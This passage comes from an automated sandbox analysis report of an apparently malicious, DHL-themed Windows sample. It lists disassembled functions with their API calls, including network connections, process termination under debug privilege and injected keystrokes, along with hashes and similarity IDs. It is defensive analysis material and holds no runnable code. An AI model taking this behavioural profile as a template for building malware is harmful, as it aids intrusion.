                                                                                      • Opcode Fuzzy Hash: 9ee3ca9e03840b01c7f71f2bc98c8a309733d74a6c86b6862fcb4c218ff386c1
                                                                                      • Instruction Fuzzy Hash: 14C10474D04249AFEF21DFA8C845BEDBBF6AF09310F044199E855A7392CB748D41CB60
                                                                                      Function 0006CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                      • String ID:
                                                                                      • API String ID: 1282221369-0
                                                                                      • Opcode ID: 772fa45dd3188dc4a5f852cd547726591804bd8783e8427523d7b23ffddb4862
                                                                                      • Instruction ID: 1741abb00b9734ea0f05e2114653837793e1eb24416a971899a8c3c5766010e0
                                                                                      • Opcode Fuzzy Hash: 772fa45dd3188dc4a5f852cd547726591804bd8783e8427523d7b23ffddb4862
                                                                                      • Instruction Fuzzy Hash: 8F611971A04601AFEB25AFB49841FBE7BE7AF05350F04417EF98597242DA369E4187A0
                                                                                      Function 00048B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00086890
                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 000868A9
                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000868B9
                                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 000868D1
                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000868F2
                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00048874,00000000,00000000,00000000,000000FF,00000000), ref: 00086901
                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0008691E
                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00048874,00000000,00000000,00000000,000000FF,00000000), ref: 0008692D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 1268354404-0
                                                                                      • Opcode ID: 6dafdfae072e3c8e24a42bd24f1f8ec22f39a3e1cdcfaf8e46fa3a9e334745a6
                                                                                      • Instruction ID: d06ff88c92382ad4269b04c9f602de5f2fb15b9b7c1d1b79012bd4e43d49b41c
                                                                                      • Opcode Fuzzy Hash: 6dafdfae072e3c8e24a42bd24f1f8ec22f39a3e1cdcfaf8e46fa3a9e334745a6
                                                                                      • Instruction Fuzzy Hash: C5515AB0600205EFEB20DF24CC55FAE7BB5FB44750F108628F996972A0DB75E990DB94
                                                                                      Function 000AC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000AC182
                                                                                      • GetLastError.KERNEL32 ref: 000AC195
                                                                                      • SetEvent.KERNEL32(?), ref: 000AC1A9
                                                                                        • Part of subcall function 000AC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000AC272
                                                                                        • Part of subcall function 000AC253: GetLastError.KERNEL32 ref: 000AC322
                                                                                        • Part of subcall function 000AC253: SetEvent.KERNEL32(?), ref: 000AC336
                                                                                        • Part of subcall function 000AC253: InternetCloseHandle.WININET(00000000), ref: 000AC341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                      • String ID:
                                                                                      • API String ID: 337547030-0
                                                                                      • Opcode ID: ce1c52117203a57327d56b0312b7da77226c0ff49cf15af7341888862cb19124
                                                                                      • Instruction ID: 9c888ac863141b38a524e2384d632c8a6e02283ba8e92b7cb61aaa40a126d023
                                                                                      • Opcode Fuzzy Hash: ce1c52117203a57327d56b0312b7da77226c0ff49cf15af7341888862cb19124
                                                                                      • Instruction Fuzzy Hash: 7B31BE71200645AFFB219FE5DD04EAABBF8FF1A300B05452EF95A86610D735E810DBA0
                                                                                      Function 000925A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00093A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00093A57
                                                                                        • Part of subcall function 00093A3D: GetCurrentThreadId.KERNEL32 ref: 00093A5E
                                                                                        • Part of subcall function 00093A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000925B3), ref: 00093A65
                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000925BD
                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000925DB
                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 000925DF
                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000925E9
                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00092601
                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00092605
                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0009260F
                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00092623
                                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00092627
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2014098862-0
                                                                                      • Opcode ID: 260cda2da3b8de5cbd366892a457d085662a199ace28fd4b4a20910ab3e77f3f
                                                                                      • Instruction ID: 2297a3c54597f6413d42c50a0d0bedc68d6da82e4f207af73ec04683fa05ccc6
                                                                                      • Opcode Fuzzy Hash: 260cda2da3b8de5cbd366892a457d085662a199ace28fd4b4a20910ab3e77f3f
                                                                                      • Instruction Fuzzy Hash: B101F230790610BBFB206769DC8AF993F59DF4EB12F110001F318AF1E2C9F22444DAAA
                                                                                      Function 00091803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00091449,?,?,00000000), ref: 0009180C
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00091449,?,?,00000000), ref: 00091813
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00091449,?,?,00000000), ref: 00091828
                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00091449,?,?,00000000), ref: 00091830
                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00091449,?,?,00000000), ref: 00091833
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00091449,?,?,00000000), ref: 00091843
                                                                                      • GetCurrentProcess.KERNEL32(00091449,00000000,?,00091449,?,?,00000000), ref: 0009184B
                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00091449,?,?,00000000), ref: 0009184E
                                                                                      • CreateThread.KERNEL32(00000000,00000000,00091874,00000000,00000000,00000000), ref: 00091868
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                      • String ID:
                                                                                      • API String ID: 1957940570-0
                                                                                      • Opcode ID: 988dc9d0380e7eaa1fdc3bc85dad13b1867fd34d91671d5bcbfbb982e5167f0a
                                                                                      • Instruction ID: e77362e85b62c784bc5f8b533100d9aed017eedf83cd1aa7534de967fd0a4358
                                                                                      • Opcode Fuzzy Hash: 988dc9d0380e7eaa1fdc3bc85dad13b1867fd34d91671d5bcbfbb982e5167f0a
                                                                                      • Instruction Fuzzy Hash: 0001BBB5240348BFF710ABA6DC4DF6B3BACEB8AB11F044411FA09DB1A1CA749800CB20
                                                                                      Function 000BA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0009D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0009D501
                                                                                        • Part of subcall function 0009D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0009D50F
                                                                                        • Part of subcall function 0009D4DC: CloseHandle.KERNEL32(00000000), ref: 0009D5DC
                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000BA16D
                                                                                      • GetLastError.KERNEL32 ref: 000BA180
                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000BA1B3
                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 000BA268
                                                                                      • GetLastError.KERNEL32(00000000), ref: 000BA273
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000BA2C4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                      • String ID: SeDebugPrivilege
                                                                                      • API String ID: 2533919879-2896544425
                                                                                      • Opcode ID: 3d02591d8c66173df777c9d88fb45191e5d256c3bd6db97610d3a9e6987ce72f
                                                                                      • Instruction ID: 14bab7f3154b8e1a7af7423a310a3b76818b980c0aed777553de2f20c8d222b1
                                                                                      • Opcode Fuzzy Hash: 3d02591d8c66173df777c9d88fb45191e5d256c3bd6db97610d3a9e6987ce72f
                                                                                      • Instruction Fuzzy Hash: B5619130204242AFE720DF19C494F99BBE5AF55318F18849CE45A8BBA3C776ED45CB92
                                                                                      Function 000C3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 000C3925
                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 000C393A
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 000C3954
                                                                                      • _wcslen.LIBCMT ref: 000C3999
                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 000C39C6
                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 000C39F4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window_wcslen
                                                                                      • String ID: SysListView32
                                                                                      • API String ID: 2147712094-78025650
                                                                                      • Opcode ID: 903011e81ae142259498ef190e6e234db7011f2ff63e10901466cd4cb801fcc8
                                                                                      • Instruction ID: 5128c7a4ef4d3a25f695c0837f5df19860282b2bca2791b9510d5e0ba328ffd5
                                                                                      • Opcode Fuzzy Hash: 903011e81ae142259498ef190e6e234db7011f2ff63e10901466cd4cb801fcc8
                                                                                      • Instruction Fuzzy Hash: CD41C231A10319ABEF219F64CC45FEE7BA9EF08350F10452AF948E7281D7B59E84CB90
                                                                                      Function 0009BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0009BCFD
                                                                                      • IsMenu.USER32(00000000), ref: 0009BD1D
                                                                                      • CreatePopupMenu.USER32 ref: 0009BD53
                                                                                      • GetMenuItemCount.USER32(00EF5DC0), ref: 0009BDA4
                                                                                      • InsertMenuItemW.USER32(00EF5DC0,?,00000001,00000030), ref: 0009BDCC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                      • String ID: 0$2
                                                                                      • API String ID: 93392585-3793063076
                                                                                      • Opcode ID: 6ebdd1e76ee771b76961aef442c1a83c502e5f6c48df07eb5188be999dd18dfc
                                                                                      • Instruction ID: 397d7cc4d2680b48ac69564aec4048a7992ba1d014543532b0266e67c48b4da8
                                                                                      • Opcode Fuzzy Hash: 6ebdd1e76ee771b76961aef442c1a83c502e5f6c48df07eb5188be999dd18dfc
                                                                                      • Instruction Fuzzy Hash: C851B070A02209DBEF20CFA8EA88BAEBBF4BF45324F144159E456DB291E7709941DB51
                                                                                      Function 000C81DB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0008F3AB,00000000,?,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 000C824C
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 000C8272
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 000C82D1
                                                                                      • ShowWindow.USER32(00000000,00000004), ref: 000C82E5
                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 000C830B
                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 000C832F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                      • String ID: p]
                                                                                      • API String ID: 642888154-1923361398
                                                                                      • Opcode ID: bbcde31bab9295200c2c70bc49f9f726f557b5fe54ed43cbff448d9ab2f8052c
                                                                                      • Instruction ID: 292b9e8cba85fcf0a3719ba5a9afad8327ee1bdf5bc1f4c06edccaf60a8da7d2
                                                                                      • Opcode Fuzzy Hash: bbcde31bab9295200c2c70bc49f9f726f557b5fe54ed43cbff448d9ab2f8052c
                                                                                      • Instruction Fuzzy Hash: D841A234601644EFEB61CF15C89DFEC7BE0FB0A714F1892ADE5484B2A2CB75A881CB54
                                                                                      Function 0009C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 0009C913
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconLoad
                                                                                      • String ID: blank$info$question$stop$warning
                                                                                      • API String ID: 2457776203-404129466
                                                                                      • Opcode ID: af5d3c9b298bf207a8707104844dbbd3e8800f472176784948213f51f89eac33
                                                                                      • Instruction ID: 62dfccbf9acd0bbe8e1e9a2e3b606f4c36231d8ba09d5cd519614c4e20125c37
                                                                                      • Opcode Fuzzy Hash: af5d3c9b298bf207a8707104844dbbd3e8800f472176784948213f51f89eac33
                                                                                      • Instruction Fuzzy Hash: 48112B35A8D30BBAFB006B54DC86CEF77DCDF15319B20002AFA00A6183D7A55D407365
                                                                                      Function 0009ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$LocalTime
                                                                                      • String ID:
                                                                                      • API String ID: 952045576-0
                                                                                      • Opcode ID: 9f1e725e0b83db06a7b0b749dfa4a5e05822b4c1f869f3c00bf565448749935e
                                                                                      • Instruction ID: aebb186f47b63da8e41aae2210be7bec8a7ffd4ded99aa2ceb4c0c2b6f1cc888
                                                                                      • Opcode Fuzzy Hash: 9f1e725e0b83db06a7b0b749dfa4a5e05822b4c1f869f3c00bf565448749935e
                                                                                      • Instruction Fuzzy Hash: DA418E65C1021876CB21EBB4C88A9DFB7BCAF45711F508466E918E3123FB34E659C3A6
                                                                                      Function 0004F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 0004F953
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 0008F3D1
                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 0008F454
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      • Opcode ID: ed3c8df6083c238ff9cd91bdd9bc143507d49fd0de72213effde5b580ee31794
                                                                                      • Instruction ID: dd1034f0f32012c44b671cd2989623e54749d98bbb2dc7e89cbab9e38edda851
                                                                                      • Opcode Fuzzy Hash: ed3c8df6083c238ff9cd91bdd9bc143507d49fd0de72213effde5b580ee31794
                                                                                      • Instruction Fuzzy Hash: 3E4128B0208682BAE779AF38C988F7A7BD1BF56314F14403DE0CB92561C775AD80CB15
                                                                                      Function 000C2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DeleteObject.GDI32(00000000), ref: 000C2D1B
                                                                                      • GetDC.USER32(00000000), ref: 000C2D23
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000C2D2E
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 000C2D3A
                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 000C2D76
                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 000C2D87
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,000C5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 000C2DC2
                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000C2DE1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3864802216-0
                                                                                      • Opcode ID: 1afcd9f24f074043833279da9f03d80442525f9146762b9a2e780b73efc3418a
                                                                                      • Instruction ID: 20347feb13cb65336bf39967c088e7200e97f88ce8e70f6ac440186d6ad02c65
                                                                                      • Opcode Fuzzy Hash: 1afcd9f24f074043833279da9f03d80442525f9146762b9a2e780b73efc3418a
                                                                                      • Instruction Fuzzy Hash: 1A317A72201614BFFB218F54CC8AFEB3BA9EF19715F084055FE099A2A1C6799C51CBA4
                                                                                      Function 00095622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
